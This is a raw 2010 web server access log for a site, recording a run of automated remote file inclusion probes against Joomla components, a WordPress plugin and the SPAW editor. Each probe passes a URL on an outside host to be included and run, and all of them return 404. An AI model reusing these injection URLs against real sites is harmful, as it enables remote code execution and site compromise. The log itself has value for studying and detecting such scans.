218.38.136.125 - - [07/Feb/2010:16:11:37 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:37 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:37 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:37 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:38 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:40 -0800] "GET /logs/access_100104.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:40 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:40 -0800] "GET /logs/access_091026.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:40 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:42 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:44 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:44 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:45 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:45 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:45 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:47 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:47 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:48 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:50 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:11:51 -0800] "GET /logs/access_091123.log///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:11:53 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:11:53 -0800] "GET /logs///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:11:54 -0800] "GET /logs/access_100104.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
61.78.109.87 - - [07/Feb/2010:16:11:58 -0800] "GET /logs/access_090921.log%20%20//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:12:04 -0800] "GET /logs/access_090817.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:12:17 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:12:18 -0800] "GET /logs/access_100104.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:12:18 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:12:19 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:12:19 -0800] "GET /logs/access_100104.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:16:12:19 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.115.213.229 - - [07/Feb/2010:16:12:19 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:16:12:19 -0800] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.115.213.229 - - [07/Feb/2010:16:12:19 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.151.206.62 - - [07/Feb/2010:16:12:19 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:12:22 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:12:22 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:16:12:23 -0800] "GET /logs/access_100201.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.115.213.229 - - [07/Feb/2010:16:12:23 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:12:23 -0800] "GET /logs/access_100104.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:12:42 -0800] "GET /logs/access_091123.log///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:12:42 -0800] "GET /logs///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:12:43 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:12:49 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:12:49 -0800] "GET /logs/access_090817.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:12:54 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:12:56 -0800] "GET /logs/access_091026.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:13:17 -0800] "GET /logs/access_090720.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:13:22 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:13:22 -0800] "GET /logs/access_090720.log%20%20/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:13:22 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:13:22 -0800] "GET /logs/access_091116.log%20%20/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:13:24 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:13:25 -0800] "GET /logs/access_090720.log%20%20/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:13:25 -0800] "GET /logs/access_091116.log%20%20/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:13:25 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:13:29 -0800] "GET /logs/access_090720.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:14:17 -0800] "GET /logs/access_090720.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:14:51 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:14:51 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:14:51 -0800] "GET /logs/access_090720.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:04 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:07 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [07/Feb/2010:16:15:08 -0800] "GET /admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [07/Feb/2010:16:15:08 -0800] "GET /logs/access_091102.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [07/Feb/2010:16:15:09 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:12 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:23 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:32 -0800] "GET /logs/access_100104.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:32 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:32 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:38 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:38 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:38 -0800] "GET /logs/access_091116.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:38 -0800] "GET /logs/access_090720.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:39 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:39 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:40 -0800] "GET /logs/access_091116.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:40 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:40 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:40 -0800] "GET /logs/access_090720.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:40 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:42 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:42 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:15:42 -0800] "GET /logs/access_091123.log%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:52 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:53 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:54 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:54 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:54 -0800] "GET /logs/access_090720.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:15:54 -0800] "GET /logs/access_091116.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:55 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:55 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:15:57 -0800] "GET /logs/access_090720.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:16:01 -0800] "GET /logs/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:16:01 -0800] "GET /logs/access_090720.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:16:01 -0800] "GET /logs/access_091116.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:16:01 -0800] "GET /index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:16:02 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:16:06 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:16:06 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
115.93.146.76 - - [07/Feb/2010:16:16:08 -0800] "GET /logs/access_090720.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:16:16:11 -0800] "GET /logs/access_100118.log%20%20///components/com_facileforms/facileforms.frame.php?ff_compath=http://musicadelibreria.net/header?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:16:16 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:16:20 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:16:21 -0800] "GET /logs/access_091228.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.151.206.62 - - [07/Feb/2010:16:16:24 -0800] "GET /logs/access_090720.log/index/wp-content/plugins/Enigma2.php?boarddir=http://amansetia.com.my/idxx.pdf??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:16:37 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:16:43 -0800] "GET /logs/access_090824.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [07/Feb/2010:16:16:50 -0800] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
218.38.136.125 - - [07/Feb/2010:16:16:50 -0800] "GET /logs/access.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
